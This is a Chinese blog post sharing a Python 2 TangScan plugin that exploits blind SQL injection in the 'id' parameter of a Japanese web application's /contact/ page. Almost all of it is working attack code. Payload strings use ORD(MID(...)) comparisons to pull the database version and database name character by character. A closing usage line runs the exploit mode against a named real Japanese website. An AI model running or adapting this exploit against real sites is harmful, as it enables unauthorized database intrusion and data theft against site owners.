A-A+

TangScan-master 日本jp某通用程序SQL注入插件–‘盲注判断字符’

2016年03月31日 16:06 学习笔记 暂无评论 共3862字 (阅读2,640 views次)

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
#! /usr/bin/env python
# -*- coding: utf-8 -*-
 
import string 
import time
from thirdparty import requests
from modules.exploit import TSExploit
 
class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "Jp SQL injection",
            "product": "",
            "product_version": "",
            "desc": """
            日本某程序SQL漏洞检测插件
            """,
            "license": self.license.TS,
            "author": ["虾米 https://woj.app"],
            "ref": [
                {self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2016-0187803"},
            ],
            "type": self.type.injection,
            "privileged": False,
            "disclosure_date": "",
            "create_date": ""
        }
        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": ""
            }
        })
        self.register_result({ 
            "status": False,
            "data": { 
 
            },
            "description": "",
            "error": ""
        })
 
 
    def verify(self): 
        user = "" 
        user_length = 0 
        url = ("{domain}/contact/?id=".format(domain=self.option.url)) 
        headers = { 
            "User-Agent": "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0", 
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
			"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
			"Accept-Encoding": "gzip, deflate"
        } 
        payloads = ['@','_','.', '-', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']+ list(string.ascii_lowercase) 
        l = "1' AND (length(version())-%s)!=0 AND 'sbsb'='sbsb" 
        s = "1' AND ORD(MID((IFNULL(CAST(version() AS CHAR),0x20)),%s,1))!=%s AND 'sbsb'='sbsb" 
 
        for x in range(1, 30): 
            tmp = l % str(x) 
            exps_url = url  +  tmp
 
            try: 
                print exps_url
                response = requests.get(exps_url, timeout=15, headers=headers, verify=False) 
                time.sleep(0.3)#限制请求速率 
                if response.status_code != 200: 
                    self.result.status = False 
                    return 
            except Exception,e: 
                self.result.error = str(e) 
                return 
            if response.content.find("name=\"\" method") != -1: 
                user_length = x 
                break 
 
        if user_length == 0: 
            self.result.status = False 
            return 
 
        for x in range(1, user_length+1): 
 
            for payload in payloads: 
                a = s % (str(x), str(ord(payload))) 
                exps_url = url  +  a 
 
                try: 
                    print exps_url, user_length
                    response = requests.get(exps_url, timeout=15, headers=headers, verify=False) 
                    time.sleep(0.3)#限制请求速率 
                    if response.status_code != 200: 
                        self.result.status = False 
                        return 
                except Exception,e: 
                    self.result.error = str(e) 
                    return 
                if response.content.find("name=\"\" method") != -1: 
                    user = user + payload 
                    break 
 
        if user.find("5.")==-1:#减小误报机率 
            self.result.status = False 
            return 
        self.result.status = True 
        self.result.description = "目标 {url} 存在SQL注入漏洞, 获取到的当前数据库版本为:{db_user}".format( 
            url=self.option.url, 
            db_user=user 
        )
 
 
    def exploit(self):
        user = "" 
        user_length = 0 
        url = ("{domain}/contact/?id=".format(domain=self.option.url)) 
        headers = { 
            "User-Agent": "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0", 
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
			"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
			"Accept-Encoding": "gzip, deflate"
        } 
        payloads = list(string.ascii_lowercase)+ ['@','_','.', '-', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'] 
        l = "1' AND (length(database())-%s)!=0 AND 'sbsb'='sbsb" 
        s = "1' AND ORD(MID((IFNULL(CAST(database() AS CHAR),0x20)),%s,1))!=%s AND 'sbsb'='sbsb" 
 
        for x in range(1, 100): 
            tmp = l % str(x) 
            exps_url = url  +  tmp
 
            try: 
                response = requests.get(exps_url, timeout=15, headers=headers, verify=False) 
                time.sleep(0.3)#限制请求速率 
                if response.status_code != 200: 
                    self.result.status = False 
                    return 
            except Exception,e: 
                self.result.error = str(e) 
                return 
            if response.content.find("name=\"\" method") != -1: 
                user_length = x 
                break 
 
        if user_length == 0: 
            self.result.status = False 
            return 
 
        for x in range(1, user_length+1): 
 
            for payload in payloads: 
                a = s % (str(x), str(ord(payload))) 
                exps_url = url  +  a 
 
                try: 
                    response = requests.get(exps_url, timeout=15, headers=headers, verify=False) 
                    time.sleep(0.3)#限制请求速率 
                    if response.status_code != 200: 
                        self.result.status = False 
                        return 
                except Exception,e: 
                    self.result.error = str(e) 
                    return 
                if response.content.find("name=\"\" method") != -1: 
                    user = user + payload 
                    break 
 
        self.result.status = True 
        self.result.description = "目标 {url} 获取到的当前数据库名称为:{db_user}".format( 
            url=self.option.url, 
            db_user=user 
        )
 
if __name__ == '__main__':
    from modules.main import main
    main(TangScan())

使用命令: 789.py --url http://www.seanskitchen.jp --mode exploit
默认命令:789.py --url http://www.seanskitchen.jp --mode exploit
框架下载地址:https://github.com/WooYun/TangScan

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×

给我留言